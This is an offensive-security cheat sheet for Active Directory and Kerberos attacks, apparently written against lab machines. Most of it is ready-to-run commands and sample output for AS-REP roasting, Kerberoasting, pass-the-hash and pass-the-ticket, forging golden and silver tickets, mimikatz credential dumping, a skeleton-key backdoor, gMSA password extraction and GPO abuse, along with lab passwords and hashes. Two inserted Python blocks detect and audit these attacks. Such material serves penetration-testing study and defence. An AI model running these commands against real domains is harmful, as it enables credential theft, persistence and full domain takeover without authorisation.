Offensive Security Notes
Kerberos (88) / Active Directory (AD)


Last updated 3 years ago

Active Directory Exploitation Cheat Sheet


Enumeration

AD LDAP enumeration

ldapsearch -x -h $IP -s base   # first query: get the naming context (defaultNamingContext)

ldapsearch -x -h "192.168.141.122" -b "DC=hutch,DC=offsec"   # second query: enumerate using the naming context found above

Impacket-GetNPUsers

The command below checks for accounts that do not require Kerberos pre-authentication and writes their AS-REP hashes in hashcat format. Crack them with hashcat.

impacket-GetNPUsers THM-AD/ -usersfile valid_users.txt -dc-ip 10.10.199.242 -format hashcat -outputfile npusers.hashcat

hashcat -m 18200 -a 0 npusers.hashcat passwordlist.txt

Kerbrute Enumeration - No domain access required

./kerbrute userenum --dc $IP -d $NetbiosDomainName ~/THM/kerbrute-room/users.lst

impacket-secretsdump - Authenticated user

impacket-secretsdump -just-dc THM-AD/backup:backup2517860@10.10.113.122

Pass the Hash through Evil-WinRM

evil-winrm -i 10.10.199.242 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

Pass the Ticket - Access as a user to the domain required

Rubeus.exe harvest /interval:30 (harvests TGTs every 30 seconds)

Rubeus.exe brute /password:Password1 /noticket

Kerberoasting - Access as any user required

Rubeus Method

Rubeus.exe kerberoast

Now that you have some hashes, save them to a text file and crack them with hashcat.

hashcat -m 13100 -a 0 hash.txt Pass.txt

Impacket Method

sudo python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.77.32 -request

AS-REP Roasting - Access as any user required

rubeus.exe asreproast

When saving the hashes to a text file, remember to insert 23$ after $krb5asrep$ so that each line starts with $krb5asrep$23$User...

hashcat -m 18200 hash.txt pass.txt

Pass the Ticket w/ mimikatz

Run mimikatz.exe

Run privilege::debug and make sure it outputs Privilege '20' OK

sekurlsa::tickets /export

Look for a .kirbi file for an account you may already have access to, such as the 'Administrator' account.

Run kerberos::ptt $ticketFile to impersonate the given ticket

Exit mimikatz and run klist to confirm you are using the cached ticket

You should now have Domain Admin rights

Golden/Silver Ticket Attacks w/ mimikatz

  • Golden ticket: with the krbtgt hash you forge a TGT, so you can obtain a service ticket for any service you want.

    • Full domain compromise (domain admin) required

  • Silver ticket: with a specific service account's hash you forge a ticket for that one service and can impersonate users to it.

    • Service hash required

  • Skeleton Key

    • Full domain compromise (domain admin) required

Run mimikatz

Run privilege::debug to confirm access

Run lsadump::lsa /inject /name:krbtgt to dump the hash and the other identifiers needed to create a golden ticket. To create a silver ticket, change /name: to dump the hash of either a domain admin account or a service account such as the SQLService account.

You will need the user's RID (the last component of the SID, usually the last 3-4 digits) for the next mimikatz command. You can find it by running the command below.

wmic useraccount where name='%username%' get sid

kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500

This is the command for creating a golden ticket. To create a silver ticket, put the service account's NTLM hash into the krbtgt slot, the SID of the service account into sid, and change the id to 1103.

misc::cmd opens a new elevated command prompt that uses the ticket loaded in mimikatz. You now have the permissions of whichever ticket (golden or silver) you created.
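As an added, defender-side example (not from this cheat sheet or from any of the tools it names): the three ticket abuses above, AS-REP roasting, Kerberoasting and forged golden tickets, each leave a distinct trace in a domain controller's Security log, and the Python below runs one simple check for each over a constructed set of 4768/4769 events. The event dictionaries, host and user names, thresholds and the 10-hour TGT lifetime are assumptions for the example; the field names used (PreAuthType, TicketEncryptionType, ServiceName, TargetUserName, IpAddress, Status) are the EventData names Windows writes in those two events.

```python
"""Defender-side triage of Kerberos ticket events (4768 / 4769) from a domain controller.
Added example, not part of the cheat sheet. The events below are constructed; the
field names follow the EventData names Windows uses in those two events."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # etype 23, the type roasting attacks ask for; AES tickets show as 0x11 / 0x12

# Constructed sample log, not captured from a real domain.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TimeCreated": "2024-01-10T09:00:01", "TargetUserName": "alice",
     "IpAddress": "10.10.10.5", "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    # TGT issued with no pre-authentication and RC4 encryption: the AS-REP is crackable offline
    {"EventID": 4768, "TimeCreated": "2024-01-10T09:00:05", "TargetUserName": "svc_backup",
     "IpAddress": "10.10.10.99", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TimeCreated": "2024-01-10T09:00:30", "TargetUserName": "bob",
     "IpAddress": "10.10.10.99", "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    # one host pulling RC4 service tickets for several SPN accounts in quick succession
    {"EventID": 4769, "TimeCreated": "2024-01-10T09:01:00", "TargetUserName": "bob@CORP.LOCAL",
     "IpAddress": "10.10.10.99", "ServiceName": "SQLService", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-01-10T09:01:02", "TargetUserName": "bob@CORP.LOCAL",
     "IpAddress": "10.10.10.99", "ServiceName": "HTTPService", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-01-10T09:01:03", "TargetUserName": "bob@CORP.LOCAL",
     "IpAddress": "10.10.10.99", "ServiceName": "svc_apache", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-01-10T09:01:04", "TargetUserName": "bob@CORP.LOCAL",
     "IpAddress": "10.10.10.99", "ServiceName": "WS01$", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-01-10T09:01:10", "TargetUserName": "alice@CORP.LOCAL",
     "IpAddress": "10.10.10.5", "ServiceName": "SQLService", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4768, "TimeCreated": "2024-01-10T09:29:00", "TargetUserName": "carol",
     "IpAddress": "10.10.10.7", "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4769, "TimeCreated": "2024-01-10T09:30:00", "TargetUserName": "carol@CORP.LOCAL",
     "IpAddress": "10.10.10.7", "ServiceName": "HTTPService", "TicketEncryptionType": "0x17", "Status": "0x0"},
    # service ticket for Administrator from a host that never asked this DC for a TGT
    {"EventID": 4769, "TimeCreated": "2024-01-10T10:00:00", "TargetUserName": "Administrator@CORP.LOCAL",
     "IpAddress": "10.10.10.200", "ServiceName": "DC01$", "TicketEncryptionType": "0x12", "Status": "0x0"},
]

def _account(name):
    # 4769 carries "user@REALM", 4768 carries "user"; normalise both to a bare lowercase name
    return name.split("@")[0].lower()

def _when(event):
    return datetime.fromisoformat(event["TimeCreated"])

def asrep_roast_candidates(events):
    """4768 events where the KDC issued a TGT without pre-authentication (PreAuthType 0)
    and encrypted the reply with RC4: exactly the reply an AS-REP roaster cracks offline."""
    return [e for e in events
            if e["EventID"] == 4768 and e["Status"] == "0x0"
            and e["PreAuthType"] == "0" and e["TicketEncryptionType"] == RC4_HMAC]

def kerberoast_candidates(events, window=timedelta(minutes=5), min_services=3):
    """Flag a source host that obtains RC4 service tickets for several distinct SPN user
    accounts inside one window. Machine accounts ($) and krbtgt are skipped: they are not
    Kerberoastable targets, and skipping them keeps ordinary host traffic out of the result."""
    by_source = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != "0x0" or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_source[e["IpAddress"]].append((_when(e), svc, _account(e["TargetUserName"])))
    findings = []
    for ip, reqs in by_source.items():
        reqs.sort()
        for i, (start, _, requester) in enumerate(reqs):
            services = {svc for t, svc, _ in reqs[i:] if t - start <= window}
            if len(services) >= min_services:
                findings.append({"source_ip": ip, "requester": requester, "services": sorted(services)})
                break  # one finding per host is enough for triage
    return findings

def tickets_without_tgt_request(events, max_tgt_age=timedelta(hours=10)):
    """Service tickets (4769) for an account/host pair that never obtained a TGT (4768) from
    this DC within the TGT lifetime. A forged (golden) TGT never passes through the KDC's AS
    exchange, so it shows up this way. Caveat: the TGT may legitimately have come from another
    DC, so run this over the combined logs of every DC before acting on a hit."""
    tgts = defaultdict(list)
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == "0x0":
            tgts[(_account(e["TargetUserName"]), e["IpAddress"])].append(_when(e))
    findings = []
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != "0x0":
            continue
        key = (_account(e["TargetUserName"]), e["IpAddress"])
        t = _when(e)
        if not any(timedelta(0) <= t - t0 <= max_tgt_age for t0 in tgts[key]):
            findings.append({"account": key[0], "source_ip": key[1], "service": e["ServiceName"]})
    return findings

if __name__ == "__main__":
    print("AS-REP roast candidates:", [e["TargetUserName"] for e in asrep_roast_candidates(SAMPLE_EVENTS)])
    print("Kerberoast candidates:", kerberoast_candidates(SAMPLE_EVENTS))
    print("Service tickets without a TGT request:", tickets_without_tgt_request(SAMPLE_EVENTS))
```

The window and min_services values are starting points to tune against your own baseline. A domain that still permits RC4 will produce benign 0x17 tickets and noisy results; that is itself worth fixing, since enforcing AES on service accounts removes the cheap cracking path these checks look for.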

Dump all NTLM hashes with mimikatz

lsadump::lsa /patch

Crack the NTLM hashes with:

hashcat -a 0 -O -m 1000 $hash /usr/share/wordlists/rockyou.txt

Kerberos Backdoors w/ mimikatz

misc::skeleton

net use \\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz

dir \\Desktop-1\c$ /user:Machine1 mimikatz

Exploitation

Group Managed Service Accounts (GMSA)

Group Managed Service Accounts provide a higher security option for non-interactive applications, services, processes, or tasks that run automatically but need a security credential.

These service accounts are given automatically-generated passwords. Given certain permissions, it is possible to retrieve these password hashes from Active Directory. To see what users or groups have permissions to do that for a given service account, we can look up the PrincipalsAllowedToRetrieveManagedPassword user property on the account.

Get-ADServiceAccount -Identity $serviceAcc -Properties * | Select PrincipalsAllowedToRetrieveManagedPassword

If we have access to an account that is in the same group as the service account then we should be able to extract the password hash of the service account.

*Evil-WinRM* PS C:\Users\enox\Documents> Get-ADServiceAccount -Identity svc_apache -Properties 'msDS-ManagedPassword'

DistinguishedName    : CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec
Enabled              : True
msDS-ManagedPassword : {1, 0, 0, 0...}
Name                 : svc_apache
ObjectClass          : msDS-GroupManagedServiceAccount
ObjectGUID           : d40bc264-0c4e-4b86-b3b9-b775995ba303
SamAccountName       : svc_apache$
SID                  : S-1-5-21-537427935-490066102-1511301751-1105
UserPrincipalName    :

*Evil-WinRM* PS C:\Users\enox\Documents> $gmsa = Get-ADServiceAccount -Identity 'svc_apache' -Properties 'msDS-ManagedPassword'
*Evil-WinRM* PS C:\Users\enox\Documents> $mp = $gmsa.'msDS-ManagedPassword'
*Evil-WinRM* PS C:\Users\enox\Documents> $mp
1
0
0
0
36
...

Looks like we have the ReadGMSAPassword privilege on the svc_apache account.

*Evil-WinRM* PS C:\Users\enox\Documents> C:/Users/enox/Documents/GMSAPasswordReader.exe --accountname svc_apache
Calculating hashes for Old Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : EA5055089775D4E018B085C20648D794
[*]       aes128_cts_hmac_sha1 : 4AD57573D862D85482A24107EE8A48AC
[*]       aes256_cts_hmac_sha1 : 8DD276B6CD4EDC9497448ED17FB66842736291C3A109A905C584B84508635795
[*]       des_cbc_md5          : 312FDCDA9DADDCCD

Calculating hashes for Current Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : DEB6F85CF5EAE0951DD89F4AFD884AE5
[*]       aes128_cts_hmac_sha1 : C5A97007F3CA002059FD8A98962760D0
[*]       aes256_cts_hmac_sha1 : 0DA099CCCBE0C0D6F5EB06E465B7CF05FF069E5E625DD10DA009CA9A795E6E8F
[*]       des_cbc_md5          : 9E340723700454E9

We now have the service account's password hash and can use it for pass-the-hash logins (evil-winrm needs the $ at the end of the username when logging in with the hash).
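The sentence above about group membership is the whole risk with gMSAs: whoever is listed in PrincipalsAllowedToRetrieveManagedPassword, directly or through a nested group, can derive the account's keys. As an added defender-side example (not part of the cheat sheet, and not code from GMSAPasswordReader or any other tool named here), the Python below resolves nested group membership to list who can effectively read each gMSA's msDS-ManagedPassword and flags ACLs that name a broad group. The group and ACL snapshot is constructed; in practice you would feed it the output of Get-ADGroupMember and Get-ADServiceAccount.

```python
"""Audit which principals can effectively read a gMSA's msDS-ManagedPassword.
Added example, not part of the cheat sheet; the directory snapshot is constructed."""

# Groups that, if listed in PrincipalsAllowedToRetrieveManagedPassword, hand the
# service account's password to essentially every authenticated principal.
BROAD_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

# Constructed snapshot: each group's direct members, which may themselves be groups.
GROUPS = {
    "Domain Admins": ["administrator"],
    "Web Admins": ["enox", "IT Contractors"],
    "IT Contractors": ["mallory"],
    "Domain Users": ["administrator", "enox", "mallory", "alice"],
}

# PrincipalsAllowedToRetrieveManagedPassword per gMSA, as Get-ADServiceAccount would show it.
GMSA_ACL = {
    "svc_apache$": ["Web Admins"],
    "svc_sql$": ["Domain Admins", "SQL01$"],
    "svc_legacy$": ["Domain Users"],
}

def expand_principal(name, groups, _seen=None):
    """Leaf principals (users and computers) reachable from `name` through nested groups.
    `_seen` guards against circular group membership, which AD permits."""
    seen = set() if _seen is None else _seen
    if name in seen:
        return set()
    seen.add(name)
    if name not in groups:            # not a group we know about: treat it as a leaf principal
        return {name}
    leaves = set()
    for member in groups[name]:
        leaves |= expand_principal(member, groups, seen)
    return leaves

def gmsa_effective_readers(gmsa_acl, groups):
    """For every gMSA: the concrete principals able to retrieve its password, and any broad
    group in the ACL that should be replaced by the specific hosts that run the service."""
    report = {}
    for account, principals in gmsa_acl.items():
        readers = set()
        for p in principals:
            readers |= expand_principal(p, groups)
        report[account] = {
            "readers": sorted(readers),
            "broad": sorted(set(principals) & BROAD_PRINCIPALS),
        }
    return report

def readers_of(account, gmsa_acl=GMSA_ACL, groups=GROUPS):
    """Convenience lookup for a single gMSA."""
    return gmsa_effective_readers(gmsa_acl, groups)[account]

if __name__ == "__main__":
    for account, info in gmsa_effective_readers(GMSA_ACL, GROUPS).items():
        flag = " (BROAD: %s)" % ", ".join(info["broad"]) if info["broad"] else ""
        print("%-12s readable by %s%s" % (account, ", ".join(info["readers"]), flag))
```

In the constructed snapshot, svc_apache$ is readable by mallory even though only Web Admins is in the ACL, because IT Contractors is nested inside it; that is the path the walkthrough above exploits. The fix is to list only the computer accounts that host the service in PrincipalsAllowedToRetrieveManagedPassword and to audit the nested membership of any group you put there.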

ZeroLogon

Exploiting ZeroLogon will break Active Directory, so only use the script in check mode to confirm whether the DC is vulnerable:

python3 zerologon.py -do check -target ATTACKTIVEDIRECT -ip $IP

GPO Abuse via SharpGPOAbuse

If our user holds the GpoEditDeleteModifySecurity permission on a GPO, we can give ourselves local administrator privileges. Confirm this by running Get-NetGPO to list the GPOs, then check the permissions on the GPO's GUID:

Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh

./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"

Run gpupdate /force to apply the updated Group Policy.

Run net localgroup Administrators to verify we are now in the Administrators group.

Then use psexec to get SYSTEM access:

python3 /usr/share/doc/python3-impacket/examples/psexec.py vault.offsec/anirudh:SecureHM@192.168.120.116

We can retrieve the password hash with GMSAPasswordReader.

Reference: S1ckB0y1337 / Active-Directory-Exploitation-Cheat-Sheet